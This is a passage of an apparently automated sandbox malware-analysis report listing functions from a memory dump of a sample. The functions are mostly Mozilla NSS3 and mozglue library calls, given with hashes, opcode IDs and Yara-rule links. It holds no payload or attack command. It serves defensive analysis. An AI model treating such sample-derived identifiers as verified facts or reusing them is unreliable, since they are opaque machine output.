                                                                                                                                                                                                                            • API String ID: 2632744278-0
                                                                                                                                                                                                                            • Opcode ID: 70ec00f1aa6343f62a118e5f5ef50d374da2e6ad5892f0bd01e6dd0d09bda471
                                                                                                                                                                                                                            • Instruction ID: 5fc5c3b4026e9f9c646ee0e72bb3901ec5dfab9d3a5eaf984455ea792adb22b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70ec00f1aa6343f62a118e5f5ef50d374da2e6ad5892f0bd01e6dd0d09bda471
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D73184B56002809FD750CF2DE880B66B7F8EF15358F148429E94CDBB05EB75E944CBA2
                                                                                                                                                                                                                            Function 6CB78C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB78C1B
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6CB78C34
                                                                                                                                                                                                                            • PL_ArenaAllocate.NSS3 ref: 6CB78C65
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB78C9C
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB78CB6
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                            • String ID: KRAM
                                                                                                                                                                                                                            • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                            • Opcode ID: bd16690f82bd817724a04002b23597c8cb66be27494a83783dcdc4bca1a9c5b4
                                                                                                                                                                                                                            • Instruction ID: 599ff3431bd030ef4e159d5dd6d3d7b4c6096d0d64216b9b727853cf3287ac6f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd16690f82bd817724a04002b23597c8cb66be27494a83783dcdc4bca1a9c5b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0721AEB1A056418FD700AF78C484569BBF4FF05318F05896EDC98DB751EB36E889CBA2
                                                                                                                                                                                                                            Function 6CC72C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6CC72CA0
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6CC72CBE
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000014), ref: 6CC72CD1
                                                                                                                                                                                                                            • strdup.MOZGLUE(?), ref: 6CC72CE1
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CC72D27
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • Loaded library %s (static lib), xrefs: 6CC72D22
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                            • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                            • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                            • Opcode ID: 61938f47d7cc4e3327e1989b6a89be5810561b312f95db451819ec3c3f98e4e7
                                                                                                                                                                                                                            • Instruction ID: 88f890a5ef4b8ae4ef8b2b909a1348335422f39cf234c6bd2cd51bc6c438dd12
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61938f47d7cc4e3327e1989b6a89be5810561b312f95db451819ec3c3f98e4e7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9711EFB1B01240DFEB208F1AD858A6A77B4EB5530DF14802ED809C7B41F731E919CBA1
                                                                                                                                                                                                                            Function 6CB6BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB6BDCA
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB6BDDB
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB6BDEC
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E
                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CB6BE03
                                                                                                                                                                                                                              • Part of subcall function 6CBBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBB8D2D,?,00000000,?), ref: 6CBBFB85
                                                                                                                                                                                                                              • Part of subcall function 6CBBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBBFBB1
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB6BE22
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB6BE30
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB6BE3B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1821307800-0
                                                                                                                                                                                                                            • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                            • Instruction ID: 5b4e74255b6d81b085b5a1ca1743a8d1e8ce2ac64a27ec2e25ad5ae6a0df35cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D01DBAAB4129177F6101667BC01F6B765C9F5128DF140031FE04EAF82FB61D51992B7
                                                                                                                                                                                                                            Function 6CBF1C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBF1C74
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6CBF1C92
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBF1C99
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6CBF1CCB
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBF1CD2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3805613680-0
                                                                                                                                                                                                                            • Opcode ID: 8ffc263e0752e84fca95f75d78e5d90cc752fdcc4c72e7394bf1b27b7e59e745
                                                                                                                                                                                                                            • Instruction ID: 890eb81788c05b2957c0ad3b53f26c9f4e2cc440317eb57ac7b2ede3852d4c1e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ffc263e0752e84fca95f75d78e5d90cc752fdcc4c72e7394bf1b27b7e59e745
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1101B5F1F012745FDF20EFA49C1DB4977B8A707319F140525E90AA6B40E7B1924987A6
                                                                                                                                                                                                                            Function 6CC51C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CB53D77,?,?,6CB54E1D), ref: 6CC51C8A
                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6CC51CB6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                            • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                                                                                                                                                            • API String ID: 1840970956-3705377941
                                                                                                                                                                                                                            • Opcode ID: f3a0a64a1e8d4081158ad97d4291192d40b1339d32d4272e98bdbb7093421a15
                                                                                                                                                                                                                            • Instruction ID: 02756af7809adf7638205adf02b76eeeef119233a09966d2f1fb483f29663432
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3a0a64a1e8d4081158ad97d4291192d40b1339d32d4272e98bdbb7093421a15
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B0124B1A002405BD700AF2CD8029B277E5EF8638CB15486DE9499BB02FB22E866C751
                                                                                                                                                                                                                            Function 6CBCED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CBCED6B
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6CBCEDCE
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,6CBCB04F), ref: 6CBCEE46
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CBCEECA
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CBCEEEA
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CBCEEFB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3768380896-0
                                                                                                                                                                                                                            • Opcode ID: 0f938ec222f15612b2e51abc9e5495c476f51ea7b520403ce05ef9d00c992f92
                                                                                                                                                                                                                            • Instruction ID: 4e97acd0e7e98df9e1759fe0a9063d71bca4bf6b5c8e0054d10308a33c96d48a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f938ec222f15612b2e51abc9e5495c476f51ea7b520403ce05ef9d00c992f92
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 308159B5B00286DFEB14CF59D881AAE77B5EF88348F144428E8169B751DB30E915CBA3
                                                                                                                                                                                                                            Function 6CBCCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBCC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CBCDAE2,?), ref: 6CBCC6C2
                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6CBCCD35
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED
                                                                                                                                                                                                                              • Part of subcall function 6CBB6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C3F
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CBCCD54
                                                                                                                                                                                                                              • Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07
                                                                                                                                                                                                                              • Part of subcall function 6CBB7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61CCC,00000000,00000000,?,?), ref: 6CBB729F
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBCCD9B
                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CBCCE0B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CBCCE2C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CBCCE40
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: PORT_ArenaMark_Util.NSS3(?,6CBCCD93,?), ref: 6CBCCEEE
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBCCD93,?), ref: 6CBCCEFC
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBCCD93,?), ref: 6CBCCF0B
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBCCD93,?), ref: 6CBCCF1D
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF47
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF67
                                                                                                                                                                                                                              • Part of subcall function 6CBCCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CBCCD93,?,?,?,?,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF78
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3748922049-0
                                                                                                                                                                                                                            • Opcode ID: c95717be3c62bf8725db98a088aba3d7f52238f618189eff14577157b57ae5fd
                                                                                                                                                                                                                            • Instruction ID: 09d6f068c8cb9310cc545886c86fd267c8b122013262104e43462967272fd387
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c95717be3c62bf8725db98a088aba3d7f52238f618189eff14577157b57ae5fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B51B1B6B001429BEB10EF69DC40BAA77F4EF59348F250524D859A7B41EB31F905CB93
                                                                                                                                                                                                                            Function 6CBF3C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBF5B56
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF3D3F
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: PORT_NewArena_Util.NSS3(00000800,6CBF3CAF,?), ref: 6CB6BABF
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CBF3CAF,?), ref: 6CB6BAD5
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CBF3CAF,?), ref: 6CB6BB08
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CBF3CAF,?), ref: 6CB6BB1A
                                                                                                                                                                                                                              • Part of subcall function 6CB6BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CBF3CAF,?), ref: 6CB6BB3B
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF3CCB
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290AB
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290C9
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: EnterCriticalSection.KERNEL32 ref: 6CC290E5
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC29116
                                                                                                                                                                                                                              • Part of subcall function 6CC29090: LeaveCriticalSection.KERNEL32 ref: 6CC2913F
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF3CE2
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBF3CF8
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF3D15
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF3D2E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
